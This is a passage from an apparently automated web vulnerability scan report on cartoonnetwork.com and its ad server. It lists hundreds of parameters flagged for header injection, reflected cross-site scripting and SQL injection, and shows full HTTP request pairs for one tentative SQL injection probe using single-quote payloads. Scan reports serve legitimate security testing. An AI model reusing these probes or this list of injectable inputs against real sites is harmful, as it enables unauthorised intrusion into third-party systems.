2.1656. http://www.cartoonnetwork.com/profiles/Witty/Kylie/Rhino/index.html [adDEmas cookie]

2.1657. http://www.cartoonnetwork.com/profiles/Witty/Kylie/Rhino/index.html [adDEon cookie]

2.1658. http://www.cartoonnetwork.com/profiles/Witty/Kylie/Rhino/index.html [name of an arbitrarily supplied request parameter]

2.1659. http://www.cartoonnetwork.com/profiles/Witty/Kylie/Rhino/index.html [route cookie]

2.1660. http://www.cartoonnetwork.com/profiles/Witty/Kylie/Rhino/index.html [s_cc cookie]

2.1661. http://www.cartoonnetwork.com/profiles/Witty/Kylie/Rhino/index.html [s_sq cookie]

2.1662. http://www.cartoonnetwork.com/profiles/Witty/Kylie/Rhino/index.html [s_vi cookie]

2.1663. http://www.cartoonnetwork.com/profiles/Yucky/Ellen/Dodo/index.html [1401316autoFreqCap cookie]

2.1664. http://www.cartoonnetwork.com/profiles/Yucky/Ellen/Dodo/index.html [JSESSIONID cookie]

2.1665. http://www.cartoonnetwork.com/profiles/Yucky/Ellen/Dodo/index.html [REST URL parameter 1]

2.1666. http://www.cartoonnetwork.com/profiles/Yucky/Ellen/Dodo/index.html [REST URL parameter 2]

2.1667. http://www.cartoonnetwork.com/profiles/Yucky/Ellen/Dodo/index.html [REST URL parameter 3]

2.1668. http://www.cartoonnetwork.com/profiles/Yucky/Ellen/Dodo/index.html [REST URL parameter 4]

2.1669. http://www.cartoonnetwork.com/profiles/Yucky/Ellen/Dodo/index.html [REST URL parameter 5]

2.1670. http://www.cartoonnetwork.com/profiles/Yucky/Ellen/Dodo/index.html [Referer HTTP header]

2.1671. http://www.cartoonnetwork.com/profiles/Yucky/Ellen/Dodo/index.html [User-Agent HTTP header]

2.1672. http://www.cartoonnetwork.com/profiles/Yucky/Ellen/Dodo/index.html [adDEmas cookie]

2.1673. http://www.cartoonnetwork.com/profiles/Yucky/Ellen/Dodo/index.html [adDEon cookie]

2.1674. http://www.cartoonnetwork.com/profiles/Yucky/Ellen/Dodo/index.html [name of an arbitrarily supplied request parameter]

2.1675. http://www.cartoonnetwork.com/profiles/Yucky/Ellen/Dodo/index.html [route cookie]

2.1676. http://www.cartoonnetwork.com/profiles/Yucky/Ellen/Dodo/index.html [s_cc cookie]

2.1677. http://www.cartoonnetwork.com/profiles/Yucky/Ellen/Dodo/index.html [s_sq cookie]

2.1678. http://www.cartoonnetwork.com/profiles/Yucky/Ellen/Dodo/index.html [s_vi cookie]

2.1679. http://www.cartoonnetwork.com/profiles/index.html [1401316autoFreqCap cookie]

2.1680. http://www.cartoonnetwork.com/profiles/index.html [JSESSIONID cookie]

2.1681. http://www.cartoonnetwork.com/profiles/index.html [REST URL parameter 1]

2.1682. http://www.cartoonnetwork.com/profiles/index.html [REST URL parameter 2]

2.1683. http://www.cartoonnetwork.com/profiles/index.html [Referer HTTP header]

2.1684. http://www.cartoonnetwork.com/profiles/index.html [User-Agent HTTP header]

2.1685. http://www.cartoonnetwork.com/profiles/index.html [adDEmas cookie]

2.1686. http://www.cartoonnetwork.com/profiles/index.html [adDEon cookie]

2.1687. http://www.cartoonnetwork.com/profiles/index.html [name of an arbitrarily supplied request parameter]

2.1688. http://www.cartoonnetwork.com/profiles/index.html [route cookie]

2.1689. http://www.cartoonnetwork.com/profiles/index.html [s_cc cookie]

2.1690. http://www.cartoonnetwork.com/profiles/index.html [s_sq cookie]

2.1691. http://www.cartoonnetwork.com/profiles/index.html [s_vi cookie]

2.1692. http://www.cartoonnetwork.com/promos/201010_chroniclesofnarnia/ [REST URL parameter 1]

2.1693. http://www.cartoonnetwork.com/promos/201010_chroniclesofnarnia/ [REST URL parameter 2]

2.1694. http://www.cartoonnetwork.com/promos/201011_honey/index.html [REST URL parameter 1]

2.1695. http://www.cartoonnetwork.com/promos/201011_honey/index.html [REST URL parameter 2]

2.1696. http://www.cartoonnetwork.com/promos/201011_honey/index.html [REST URL parameter 3]

2.1697. http://www.cartoonnetwork.com/promos/mim [1401316autoFreqCap cookie]

2.1698. http://www.cartoonnetwork.com/promos/mim [JSESSIONID cookie]

2.1699. http://www.cartoonnetwork.com/promos/mim [REST URL parameter 1]

2.1700. http://www.cartoonnetwork.com/promos/mim [REST URL parameter 2]

2.1701. http://www.cartoonnetwork.com/promos/mim [Referer HTTP header]

2.1702. http://www.cartoonnetwork.com/promos/mim [User-Agent HTTP header]

2.1703. http://www.cartoonnetwork.com/promos/mim [adDEmas cookie]

2.1704. http://www.cartoonnetwork.com/promos/mim [adDEon cookie]

2.1705. http://www.cartoonnetwork.com/promos/mim [name of an arbitrarily supplied request parameter]

2.1706. http://www.cartoonnetwork.com/promos/mim [route cookie]

2.1707. http://www.cartoonnetwork.com/promos/mim [s_cc cookie]

2.1708. http://www.cartoonnetwork.com/promos/mim [s_sq cookie]

2.1709. http://www.cartoonnetwork.com/promos/mim [s_vi cookie]

2.1710. http://www.cartoonnetwork.com/redirects/shop/index_exclude.html [REST URL parameter 1]

2.1711. http://www.cartoonnetwork.com/redirects/shop/index_exclude.html [REST URL parameter 2]

2.1712. http://www.cartoonnetwork.com/redirects/shop/index_exclude.html [REST URL parameter 3]

2.1713. http://www.cartoonnetwork.com/redirects/third/index_exclude.html [REST URL parameter 1]

2.1714. http://www.cartoonnetwork.com/redirects/third/index_exclude.html [REST URL parameter 2]

2.1715. http://www.cartoonnetwork.com/redirects/third/index_exclude.html [REST URL parameter 3]

2.1716. http://www.cartoonnetwork.com/tdi/ [REST URL parameter 1]

2.1717. http://www.cartoonnetwork.com/tools/css/home/_styles.css [REST URL parameter 1]

2.1718. http://www.cartoonnetwork.com/tools/css/home/_styles.css [REST URL parameter 2]

2.1719. http://www.cartoonnetwork.com/tools/css/home/_styles.css [REST URL parameter 3]

2.1720. http://www.cartoonnetwork.com/tools/css/home/_styles.css [REST URL parameter 4]

2.1721. http://www.cartoonnetwork.com/tools/css/schedule/_schedule.css [REST URL parameter 1]

2.1722. http://www.cartoonnetwork.com/tools/css/schedule/_schedule.css [REST URL parameter 2]

2.1723. http://www.cartoonnetwork.com/tools/css/schedule/_schedule.css [REST URL parameter 3]

2.1724. http://www.cartoonnetwork.com/tools/css/schedule/_schedule.css [REST URL parameter 4]

2.1725. http://www.cartoonnetwork.com/tools/includes/cmagen/navigation.xml [REST URL parameter 1]

2.1726. http://www.cartoonnetwork.com/tools/includes/cmagen/navigation.xml [REST URL parameter 2]

2.1727. http://www.cartoonnetwork.com/tools/includes/cmagen/navigation.xml [REST URL parameter 3]

2.1728. http://www.cartoonnetwork.com/tools/includes/cmagen/navigation.xml [REST URL parameter 4]

2.1729. http://www.cartoonnetwork.com/tools/js/AC_OETags.js [REST URL parameter 1]

2.1730. http://www.cartoonnetwork.com/tools/js/AC_OETags.js [REST URL parameter 2]

2.1731. http://www.cartoonnetwork.com/tools/js/AC_OETags.js [REST URL parameter 3]

2.1732. http://www.cartoonnetwork.com/tools/js/CNModWindow.js [REST URL parameter 1]

2.1733. http://www.cartoonnetwork.com/tools/js/CNModWindow.js [REST URL parameter 2]

2.1734. http://www.cartoonnetwork.com/tools/js/CNModWindow.js [REST URL parameter 3]

2.1735. http://www.cartoonnetwork.com/tools/js/ClickMapTracking.js [REST URL parameter 1]

2.1736. http://www.cartoonnetwork.com/tools/js/ClickMapTracking.js [REST URL parameter 2]

2.1737. http://www.cartoonnetwork.com/tools/js/ClickMapTracking.js [REST URL parameter 3]

2.1738. http://www.cartoonnetwork.com/tools/js/FlashVideoComm.js [REST URL parameter 1]

2.1739. http://www.cartoonnetwork.com/tools/js/FlashVideoComm.js [REST URL parameter 2]

2.1740. http://www.cartoonnetwork.com/tools/js/FlashVideoComm.js [REST URL parameter 3]

2.1741. http://www.cartoonnetwork.com/tools/js/HttpUtils.js [REST URL parameter 1]

2.1742. http://www.cartoonnetwork.com/tools/js/HttpUtils.js [REST URL parameter 2]

2.1743. http://www.cartoonnetwork.com/tools/js/HttpUtils.js [REST URL parameter 3]

2.1744. http://www.cartoonnetwork.com/tools/js/ac_fl.js [REST URL parameter 1]

2.1745. http://www.cartoonnetwork.com/tools/js/ac_fl.js [REST URL parameter 2]

2.1746. http://www.cartoonnetwork.com/tools/js/ac_fl.js [REST URL parameter 3]

2.1747. http://www.cartoonnetwork.com/tools/js/brandcma.js [REST URL parameter 1]

2.1748. http://www.cartoonnetwork.com/tools/js/brandcma.js [REST URL parameter 2]

2.1749. http://www.cartoonnetwork.com/tools/js/brandcma.js [REST URL parameter 3]

2.1750. http://www.cartoonnetwork.com/tools/js/clickmap/ClickMapTracking_games.js [REST URL parameter 1]

2.1751. http://www.cartoonnetwork.com/tools/js/clickmap/ClickMapTracking_games.js [REST URL parameter 2]

2.1752. http://www.cartoonnetwork.com/tools/js/clickmap/ClickMapTracking_games.js [REST URL parameter 3]

2.1753. http://www.cartoonnetwork.com/tools/js/clickmap/ClickMapTracking_games.js [REST URL parameter 4]

2.1754. http://www.cartoonnetwork.com/tools/js/cookies.js [REST URL parameter 1]

2.1755. http://www.cartoonnetwork.com/tools/js/cookies.js [REST URL parameter 2]

2.1756. http://www.cartoonnetwork.com/tools/js/cookies.js [REST URL parameter 3]

2.1757. http://www.cartoonnetwork.com/tools/js/home/FlexSpace.js [REST URL parameter 1]

2.1758. http://www.cartoonnetwork.com/tools/js/home/FlexSpace.js [REST URL parameter 2]

2.1759. http://www.cartoonnetwork.com/tools/js/home/FlexSpace.js [REST URL parameter 3]

2.1760. http://www.cartoonnetwork.com/tools/js/home/FlexSpace.js [REST URL parameter 4]

2.1761. http://www.cartoonnetwork.com/tools/js/home/datasets.js [REST URL parameter 1]

2.1762. http://www.cartoonnetwork.com/tools/js/home/datasets.js [REST URL parameter 2]

2.1763. http://www.cartoonnetwork.com/tools/js/home/datasets.js [REST URL parameter 3]

2.1764. http://www.cartoonnetwork.com/tools/js/home/datasets.js [REST URL parameter 4]

2.1765. http://www.cartoonnetwork.com/tools/js/home/home.js [REST URL parameter 1]

2.1766. http://www.cartoonnetwork.com/tools/js/home/home.js [REST URL parameter 2]

2.1767. http://www.cartoonnetwork.com/tools/js/home/home.js [REST URL parameter 3]

2.1768. http://www.cartoonnetwork.com/tools/js/home/home.js [REST URL parameter 4]

2.1769. http://www.cartoonnetwork.com/tools/js/home/videoConfig.js [REST URL parameter 1]

2.1770. http://www.cartoonnetwork.com/tools/js/home/videoConfig.js [REST URL parameter 2]

2.1771. http://www.cartoonnetwork.com/tools/js/home/videoConfig.js [REST URL parameter 3]

2.1772. http://www.cartoonnetwork.com/tools/js/home/videoConfig.js [REST URL parameter 4]

2.1773. http://www.cartoonnetwork.com/tools/js/mm_menu.js [REST URL parameter 1]

2.1774. http://www.cartoonnetwork.com/tools/js/mm_menu.js [REST URL parameter 2]

2.1775. http://www.cartoonnetwork.com/tools/js/mm_menu.js [REST URL parameter 3]

2.1776. http://www.cartoonnetwork.com/tools/js/motionpack.js [REST URL parameter 1]

2.1777. http://www.cartoonnetwork.com/tools/js/motionpack.js [REST URL parameter 2]

2.1778. http://www.cartoonnetwork.com/tools/js/motionpack.js [REST URL parameter 3]

2.1779. http://www.cartoonnetwork.com/tools/js/parseTime.js [REST URL parameter 1]

2.1780. http://www.cartoonnetwork.com/tools/js/parseTime.js [REST URL parameter 2]

2.1781. http://www.cartoonnetwork.com/tools/js/parseTime.js [REST URL parameter 3]

2.1782. http://www.cartoonnetwork.com/tools/js/prestitial.js [REST URL parameter 1]

2.1783. http://www.cartoonnetwork.com/tools/js/prestitial.js [REST URL parameter 2]

2.1784. http://www.cartoonnetwork.com/tools/js/prestitial.js [REST URL parameter 3]

2.1785. http://www.cartoonnetwork.com/tools/js/previewPage.js [REST URL parameter 1]

2.1786. http://www.cartoonnetwork.com/tools/js/previewPage.js [REST URL parameter 2]

2.1787. http://www.cartoonnetwork.com/tools/js/previewPage.js [REST URL parameter 3]

2.1788. http://www.cartoonnetwork.com/tools/js/s_code.js [REST URL parameter 1]

2.1789. http://www.cartoonnetwork.com/tools/js/s_code.js [REST URL parameter 2]

2.1790. http://www.cartoonnetwork.com/tools/js/s_code.js [REST URL parameter 3]

2.1791. http://www.cartoonnetwork.com/tools/js/scroller.js [REST URL parameter 1]

2.1792. http://www.cartoonnetwork.com/tools/js/scroller.js [REST URL parameter 2]

2.1793. http://www.cartoonnetwork.com/tools/js/scroller.js [REST URL parameter 3]

2.1794. http://www.cartoonnetwork.com/tools/js/search/search.js [REST URL parameter 1]

2.1795. http://www.cartoonnetwork.com/tools/js/search/search.js [REST URL parameter 2]

2.1796. http://www.cartoonnetwork.com/tools/js/search/search.js [REST URL parameter 3]

2.1797. http://www.cartoonnetwork.com/tools/js/search/search.js [REST URL parameter 4]

2.1798. http://www.cartoonnetwork.com/tools/js/slider.js [REST URL parameter 1]

2.1799. http://www.cartoonnetwork.com/tools/js/slider.js [REST URL parameter 2]

2.1800. http://www.cartoonnetwork.com/tools/js/slider.js [REST URL parameter 3]

2.1801. http://www.cartoonnetwork.com/tools/js/spry/SpryAccordion.js [REST URL parameter 1]

2.1802. http://www.cartoonnetwork.com/tools/js/spry/SpryAccordion.js [REST URL parameter 2]

2.1803. http://www.cartoonnetwork.com/tools/js/spry/SpryAccordion.js [REST URL parameter 3]

2.1804. http://www.cartoonnetwork.com/tools/js/spry/SpryAccordion.js [REST URL parameter 4]

2.1805. http://www.cartoonnetwork.com/tools/js/spry/SpryCarousel.js [REST URL parameter 1]

2.1806. http://www.cartoonnetwork.com/tools/js/spry/SpryCarousel.js [REST URL parameter 2]

2.1807. http://www.cartoonnetwork.com/tools/js/spry/SpryCarousel.js [REST URL parameter 3]

2.1808. http://www.cartoonnetwork.com/tools/js/spry/SpryCarousel.js [REST URL parameter 4]

2.1809. http://www.cartoonnetwork.com/tools/js/spry/SpryCollapsiblePanel.js [REST URL parameter 1]

2.1810. http://www.cartoonnetwork.com/tools/js/spry/SpryCollapsiblePanel.js [REST URL parameter 2]

2.1811. http://www.cartoonnetwork.com/tools/js/spry/SpryCollapsiblePanel.js [REST URL parameter 3]

2.1812. http://www.cartoonnetwork.com/tools/js/spry/SpryCollapsiblePanel.js [REST URL parameter 4]

2.1813. http://www.cartoonnetwork.com/tools/js/spry/SpryDataSetShell.js [REST URL parameter 1]

2.1814. http://www.cartoonnetwork.com/tools/js/spry/SpryDataSetShell.js [REST URL parameter 2]

2.1815. http://www.cartoonnetwork.com/tools/js/spry/SpryDataSetShell.js [REST URL parameter 3]

2.1816. http://www.cartoonnetwork.com/tools/js/spry/SpryDataSetShell.js [REST URL parameter 4]

2.1817. http://www.cartoonnetwork.com/tools/js/spry/SpryJSONDataSet.js [REST URL parameter 1]

2.1818. http://www.cartoonnetwork.com/tools/js/spry/SpryJSONDataSet.js [REST URL parameter 2]

2.1819. http://www.cartoonnetwork.com/tools/js/spry/SpryJSONDataSet.js [REST URL parameter 3]

2.1820. http://www.cartoonnetwork.com/tools/js/spry/SpryJSONDataSet.js [REST URL parameter 4]

2.1821. http://www.cartoonnetwork.com/tools/js/spry/SpryRating.js [REST URL parameter 1]

2.1822. http://www.cartoonnetwork.com/tools/js/spry/SpryRating.js [REST URL parameter 2]

2.1823. http://www.cartoonnetwork.com/tools/js/spry/SpryRating.js [REST URL parameter 3]

2.1824. http://www.cartoonnetwork.com/tools/js/spry/SpryRating.js [REST URL parameter 4]

2.1825. http://www.cartoonnetwork.com/tools/js/spry/SprySlidingPanels.js [REST URL parameter 1]

2.1826. http://www.cartoonnetwork.com/tools/js/spry/SprySlidingPanels.js [REST URL parameter 2]

2.1827. http://www.cartoonnetwork.com/tools/js/spry/SprySlidingPanels.js [REST URL parameter 3]

2.1828. http://www.cartoonnetwork.com/tools/js/spry/SprySlidingPanels.js [REST URL parameter 4]

2.1829. http://www.cartoonnetwork.com/tools/js/swfobject.js [REST URL parameter 1]

2.1830. http://www.cartoonnetwork.com/tools/js/swfobject.js [REST URL parameter 2]

2.1831. http://www.cartoonnetwork.com/tools/js/swfobject.js [REST URL parameter 3]

2.1832. http://www.cartoonnetwork.com/tools/js/utils.js [REST URL parameter 1]

2.1833. http://www.cartoonnetwork.com/tools/js/utils.js [REST URL parameter 2]

2.1834. http://www.cartoonnetwork.com/tools/js/utils.js [REST URL parameter 3]

2.1835. http://www.cartoonnetwork.com/tools/xml/globalnav/config.xml [REST URL parameter 1]

2.1836. http://www.cartoonnetwork.com/tools/xml/globalnav/config.xml [REST URL parameter 2]

2.1837. http://www.cartoonnetwork.com/tools/xml/globalnav/config.xml [REST URL parameter 3]

2.1838. http://www.cartoonnetwork.com/tools/xml/globalnav/config.xml [REST URL parameter 4]

2.1839. http://www.cartoonnetwork.com/tools/xml/player_configs/player_homepage.xml [REST URL parameter 1]

2.1840. http://www.cartoonnetwork.com/tools/xml/player_configs/player_homepage.xml [REST URL parameter 2]

2.1841. http://www.cartoonnetwork.com/tools/xml/player_configs/player_homepage.xml [REST URL parameter 3]

2.1842. http://www.cartoonnetwork.com/tools/xml/player_configs/player_homepage.xml [REST URL parameter 4]

2.1843. http://www.cartoonnetwork.com/tools/xml/properties_LoginModule.xml [REST URL parameter 1]

2.1844. http://www.cartoonnetwork.com/tools/xml/properties_LoginModule.xml [REST URL parameter 2]

2.1845. http://www.cartoonnetwork.com/tools/xml/properties_LoginModule.xml [REST URL parameter 3]

2.1846. http://www.cartoonnetwork.com/tools/xml/tos.xml [REST URL parameter 1]

2.1847. http://www.cartoonnetwork.com/tools/xml/tos.xml [REST URL parameter 2]

2.1848. http://www.cartoonnetwork.com/tools/xml/tos.xml [REST URL parameter 3]

2.1849. http://www.cartoonnetwork.com/toon_adspaces/cnn_adspaces.js [REST URL parameter 1]

2.1850. http://www.cartoonnetwork.com/toon_adspaces/cnn_adspaces.js [REST URL parameter 2]

2.1851. http://www.cartoonnetwork.com/tv_shows/twf/index.html [REST URL parameter 1]

2.1852. http://www.cartoonnetwork.com/tv_shows/twf/index.html [REST URL parameter 2]

2.1853. http://www.cartoonnetwork.com/tv_shows/twf/index.html [REST URL parameter 3]

2.1854. http://www.cartoonnetwork.com/tv_shows/twf/maskmaker.html [REST URL parameter 1]

2.1855. http://www.cartoonnetwork.com/tv_shows/twf/maskmaker.html [REST URL parameter 2]

2.1856. http://www.cartoonnetwork.com/tv_shows/twf/maskmaker.html [REST URL parameter 3]

2.1857. http://www.cartoonnetwork.com/tv_shows/twf/royalthumble.html [REST URL parameter 1]

2.1858. http://www.cartoonnetwork.com/tv_shows/twf/royalthumble.html [REST URL parameter 2]

2.1859. http://www.cartoonnetwork.com/tv_shows/twf/royalthumble.html [REST URL parameter 3]

2.1860. http://www.cartoonnetwork.com/users/tools/js/jquery/jcarousellite_1.0.1c4.js [REST URL parameter 1]

2.1861. http://www.cartoonnetwork.com/users/tools/js/jquery/jcarousellite_1.0.1c4.js [REST URL parameter 2]

2.1862. http://www.cartoonnetwork.com/users/tools/js/jquery/jcarousellite_1.0.1c4.js [REST URL parameter 3]

2.1863. http://www.cartoonnetwork.com/users/tools/js/jquery/jcarousellite_1.0.1c4.js [REST URL parameter 4]

2.1864. http://www.cartoonnetwork.com/users/tools/js/jquery/jcarousellite_1.0.1c4.js [REST URL parameter 5]

2.1865. http://www.cartoonnetwork.com/users/tools/js/jquery/jquery-latest.pack.js [REST URL parameter 1]

2.1866. http://www.cartoonnetwork.com/users/tools/js/jquery/jquery-latest.pack.js [REST URL parameter 2]

2.1867. http://www.cartoonnetwork.com/users/tools/js/jquery/jquery-latest.pack.js [REST URL parameter 3]

2.1868. http://www.cartoonnetwork.com/users/tools/js/jquery/jquery-latest.pack.js [REST URL parameter 4]

2.1869. http://www.cartoonnetwork.com/users/tools/js/jquery/jquery-latest.pack.js [REST URL parameter 5]

2.1870. http://www.cartoonnetwork.com/video/staged/HOME.configuration.xml [REST URL parameter 1]

2.1871. http://www.cartoonnetwork.com/video/staged/HOME.configuration.xml [REST URL parameter 2]

2.1872. http://www.cartoonnetwork.com/video/staged/HOME.configuration.xml [REST URL parameter 3]

3. HTTP header injection

3.1. http://cartoonnetwork.com/tv_shows/ben10ua/index.html [REST URL parameter 1]

3.2. http://cartoonnetwork.com/tv_shows/ben10ua/index.html [REST URL parameter 2]

3.3. http://cartoonnetwork.com/tv_shows/ben10ua/index.html [REST URL parameter 3]

3.4. http://www.cartoonnetwork.com/cnservice/cartoonsvc/content/xml/getContentById.do [REST URL parameter 5]

3.5. http://www.cartoonnetwork.com/cnservice/content/xml/getContentById.do [REST URL parameter 4]

4. Cross-site scripting (reflected)

4.1. http://www.cartoonnetwork.com/cnschedule/xmlServices/ScheduleServices [methodName parameter]

4.2. http://www.cartoonnetwork.com/cnservice/cartoonsvc/content/xml/getContentById.do [contentId parameter]

4.3. http://www.cartoonnetwork.com/cnservice/content/xml/getContentById.do [contentId parameter]

4.4. http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=1x1_bot&toon_rollup=games&toon_section=homepage¶ms.styles=fs [NGUserID cookie]

4.5. http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=1x1_skin&toon_rollup=homepage¶ms.styles=fs [NGUserID cookie]

4.6. http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=1x1_skin&toon_rollup=homepage¶ms.styles=fs&tile=3795625302921&domId=114568 [NGUserID cookie]

4.7. http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=games&toon_section=homepage¶ms.styles=fs [NGUserID cookie]

4.8. http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=homepage¶ms.styles=fs [NGUserID cookie]

4.9. http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=homepage¶ms.styles=fs&tile=3795625302922&domId=97279 [NGUserID cookie]

4.10. http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top¶ms.styles=fs [NGUserID cookie]

4.11. http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top¶ms.styles=fs&tile=7355535302921&domId=89496 [NGUserID cookie]

4.12. http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&toon_rollup=games&toon_section=homepage¶ms.styles=fs [NGUserID cookie]

4.13. http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&toon_rollup=homepage¶ms.styles=fs [NGUserID cookie]

4.14. http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&toon_rollup=homepage¶ms.styles=fs&tile=3795625302922&domId=155101 [NGUserID cookie]

4.15. http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&toon_rollup=message_boards¶ms.styles=fs [NGUserID cookie]



1. SQL injection  next
There are 24 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ads.cartoonnetwork.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=472781&FlightID=345105&TargetID=105191&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4677,4960,11948,19419,24537,28173,31159,31774,32749,33852,36742,37272,37430,37605,37606,37607,37612,39847,40253,40617,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,66830,77699,107525,107666,88092,110999,105191,103340,105451,111147&Values=46,60,85,100,150,682,685,917,1063,1285,1678,1690,1735,1815,4450,38253,47118,47457,47781,47892,52263,52899,56058,56872,57005,57006,58702,61089,61263,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C7355535302921&random=caginve,bgqfzjgkorfyW [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cartoonnetwork.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=472781&FlightID=345105&TargetID=105191&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4677,4960,11948,19419,24537,28173,31159,31774,32749,33852,36742,37272,37430,37605,37606,37607,37612,39847,40253,40617,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,66830,77699,107525,107666,88092,110999,105191,103340,105451,111147&Values=46,60,85,100,150,682,685,917,1063,1285,1678,1690,1735,1815,4450,38253,47118,47457,47781,47892,52263,52899,56058,56872,57005,57006,58702,61089,61263,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C7355535302921&random=caginve,bgqfzjgkorfyW

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=472781&FlightID=345105&TargetID=105191&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4677,4960,11948,19419,24537,28173,31159,31774,32749,33852,36742,37272,37430,37605,37606,37607,37612,39847,40253,40617,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,66830,77699,107525,107666,88092,110999,105191,103340,105451,111147&Values=46,60,85,100,150,682,685,917,1063,1285,1678,1690,1735,1815,4450,38253,47118,47457,47781,47892,52263,52899,56058,56872,57005,57006,58702,61089,61263,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C7355535302921&random=caginve,bgqfzjgkorfyW HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&params.styles=fs&tile=7355535302921&domId=89496
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 02:47:21 GMT
Server: Apache
Content-Length: 609
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=472781&FlightID=345105&TargetID=105191&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4677,4960,11948,19419,24537,28173,31159,31774,32749,33852,36742,37272,37430,37605,37606,37607,37612,39847,40253,40617,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,66830,77699,107525,107666,88092,110999,105191,103340,105451,111147&Values=46,60,85,100,150,682,685,917,1063,1285,1678,1690,1735,1815,4450,38253,47118,47457,47781,47892,52263,52899,56058,56872,57005,57006,58702,61089,61263,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C7355535302921&random=caginve,bgqfzjgkorfyW HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&params.styles=fs&tile=7355535302921&domId=89496
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 02:47:21 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://i.cdn.turner.com/cnn/images/1.gif
Expires: Sat, 11 Dec 2010 02:47:21 GMT
Content-Type: text/html


